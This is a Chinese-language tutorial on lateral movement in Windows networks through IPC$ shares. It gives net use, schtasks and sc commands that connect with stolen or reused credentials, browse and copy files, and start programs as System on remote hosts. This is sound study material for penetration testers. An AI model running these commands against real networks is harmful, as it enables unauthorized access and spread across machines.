概述

IPC$

IPC（Internet process connection）共享，为了实现进程间通信而开放的命名管道。

IPC可以通过验证用户名和密码获得相应的权限，通常在远程管理和查看计算机的共享资源时使用。通过IPC$可以与目标机器建立连接，不仅可以访问目标机器的文件进行上传、下载等操作，还可以在目标机器上运行其他命令，以获取目标机器的目标结构、用户列表等信息。

共享文件

文件共享指的是主动在网络上共享自己计算机中的文件，默认共享是为了方便管理员进行远程管理而默认开启的。

逻辑磁盘默认都是处于共享状态的。

访问的命令格式为

\\IP地址\磁盘符$

注意：如果当前计算机A的用户账户是administrator，目标机器B上的账户也是administrator，且密码相同，则不需要输入密码就可以访问，默认会用本地账户密码进行认证。

\\192.168.110.20\c$

IPC$连接方式

用户组连接

net use \\IP\ipc$ "password" /user:"username"

域用户连接

net use \\域名\ipc$ "域成员密码" /user：域名\域成员账户

删除ipc$连接

net use \\IP\ipc$ /del

利用条件

1、开启了139、445端口

IPC$可以实现远程登录及对默认共享资源的访问，445端口可以实现对共享文件打印机的访问，一般来讲需要445端口的支持。

2、管理员开启了默认共享

默认共享是为了访问管理员进行远程管理而默认开启的，包括所有的逻辑盘可以实现对这些默认共享目录的访问。

3、必须得知道对方机器的用户名和密码

注意：在内网中，很多计算机的账户密码都是一样的，故可以通过抓取本地计算机的账户密码，然后和对方的电脑进行IP连接

相关命令

查看共享资源

net share

删除C盘的共享

net share c$ /del

设置共享盘的名字

net share xbxaq=D:\  #设置D盘共享，共享名字为xbxaq

不同权限下的命令

IPC$建立连接之后，可执行系列命令：

查看远程计算机的盘符目录

dir \\IP\c$

查询远程计算机上的进程

tasklist /S IP地址

查看远端计算机上的文件内容

type \\IP\c$\文件路径

查询远端计算机上的时间

net time \\IP地址

将本地计算机的文件复制到远端计算机

copy 文件 \\IP地址\C$

不同权限下执行相同的命令

与计划任务配合横向

利用计划任务功能，可以将任何脚本、程序或者文档安排在某个最方便的时间运行，计划任务在每次系统启动的时候启动并在后台运行。

计划任务在Windows XP电脑上使用at命令，Windows XP之后的电脑使用的是schtasks命令

#远程创建计划任务
schtasks /create /s 192.168.110.20 /u administrator /p a1b2c3.. /tn test
/tr c:/1.txt /sc onstart /RU System /F


schtasks /create /s 192.168.110.20 /tn test /tr c:/1.txt /sc onstart /RU System
/F


#运行计划任务
schtasks /run /s IP地址  /u username /p password /i /tn "计划任务名称"


#删除计划任务
schtasks /delete /s IP地址  /u username /p password /tn "计划任务名称" /f

注意：建立IPC认证之后，如果当前的用户是administrator，则不再需要账户密码

与Windows服务配合横向

Microsoft Windows 服务（即 以前的NT服务），能够创建在它们自己的Windows会话中且可长时间运行可执行的应用服务。

相关命令

创建服务

sc \\IP地址 create test binpath= "cmd.exe /c c:\xbxaq.exe"

binpath= "cmd.exe /c c:\xbxaq.exe" ===> 通过cmd程序运行在C盘下面的xbxaq.exe

开启服务

sc \\IP地址 start test

删除服务

sc \\IP地址 delete test

与盘符映射横向

盘符映射就是将远程的共享磁盘映射到自己的电脑上，在已经建立IPC$连接的前提下，可以使用以下这个命令进行盘符映射。

net use 本地盘符:\\IP地址\远程的盘符$

例如：
net use k:\\192.168.110.10\c$

将ip10计算机上的C盘映射到本地的K盘上